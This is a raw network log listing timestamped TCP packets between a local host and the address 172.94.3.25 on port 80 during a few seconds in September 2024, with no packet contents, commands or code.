Sep 25, 2024 16:03:41.203111887 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.225744963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225764990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225790977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225804090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225816011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225828886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225913048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.225965977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.225972891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.225977898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226006985 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226135969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226147890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226159096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226172924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226197958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226227045 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226294994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226305962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226316929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226327896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226340055 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226367950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226717949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226731062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226746082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226769924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.226859093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226870060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.226891994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.227020979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.227031946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.227052927 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.280525923 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.293745041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.293762922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.293900967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.302701950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302721977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302742004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302755117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302764893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302771091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302779913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.302840948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.302894115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.303210020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303235054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303246021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303256989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.303284883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.303313017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303324938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303335905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303370953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.303448915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303469896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303479910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.303488970 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.303515911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.382337093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382427931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382438898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382451057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382464886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382477045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382508993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.382545948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.382742882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382914066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382925987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382937908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382951975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382963896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.382967949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.382989883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.383017063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.383414030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383425951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383438110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383449078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383460999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383469105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.383508921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.383547068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383559942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.383582115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.436798096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468204975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468225956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468245983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468266964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468280077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468292952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468302965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468317986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468329906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468338966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468349934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468353987 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468363047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468373060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468405008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468415976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468450069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468460083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468470097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468482018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468488932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468509912 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468537092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.468554974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468568087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.468607903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.469337940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.469412088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.469461918 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546447039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546475887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546489000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546499968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546516895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546530008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546542883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546556950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546569109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546586037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546590090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546597004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546602964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546608925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546643972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546665907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546683073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546714067 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546761036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546772003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546782017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546802998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546811104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546847105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.546861887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546873093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.546902895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.624382973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624413967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624428034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624439955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624542952 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.624718904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624742985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624753952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624778986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.624829054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624840975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624851942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624862909 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.624866009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624887943 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.624893904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.624927998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.625215054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625226974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625237942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625253916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.625276089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625288963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625300884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.625313044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.625334024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:41.634615898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.634633064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:41.634742022 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.718461037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718488932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718501091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718512058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718524933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718535900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718548059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718559027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718584061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718594074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718604088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718610048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718621016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718632936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718642950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718655109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718661070 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.718667030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718694925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.718705893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.718718052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.718750954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.719824076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.719897032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:42.720757008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:42.720803976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.607805967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607830048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607846975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607858896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607870102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607881069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607891083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607906103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607918024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607928038 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607939005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607950926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.607965946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608094931 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.608144045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608155012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608165979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608179092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608189106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608191967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.608205080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608210087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.608216047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608227968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.608247042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.655635118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685564995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685602903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685614109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685625076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685638905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685648918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685703993 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685728073 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685739994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685750961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685760975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685771942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685785055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685800076 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685813904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685843945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685854912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685866117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685874939 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685895920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685905933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.685909986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685920954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.685956001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.686060905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.686072111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.686083078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.686099052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.686124086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.763695002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763725042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763736010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763746977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763760090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763772011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.763864040 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.763892889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.763986111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764065981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764075994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764096022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764106989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764113903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764142990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764218092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764261007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764312029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764322042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764332056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764358997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764580965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764619112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764664888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764676094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764703989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.764723063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764733076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764744043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.764766932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.811794996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842339039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842369080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842384100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842405081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842417002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842418909 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842428923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842442989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842453003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842454910 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842489004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842506886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842559099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842569113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842588902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842596054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842601061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842622995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.842933893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842943907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842961073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842972040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842983007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.842994928 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.843009949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.843040943 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920383930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920406103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920418978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920429945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920443058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920454025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920484066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920547962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920587063 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920671940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920681953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920692921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920706034 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920730114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920731068 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920788050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920797110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920814991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920816898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:43.920825958 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:43.920838118 CEST	80	49715	172.94.3.25	192.168.2.6
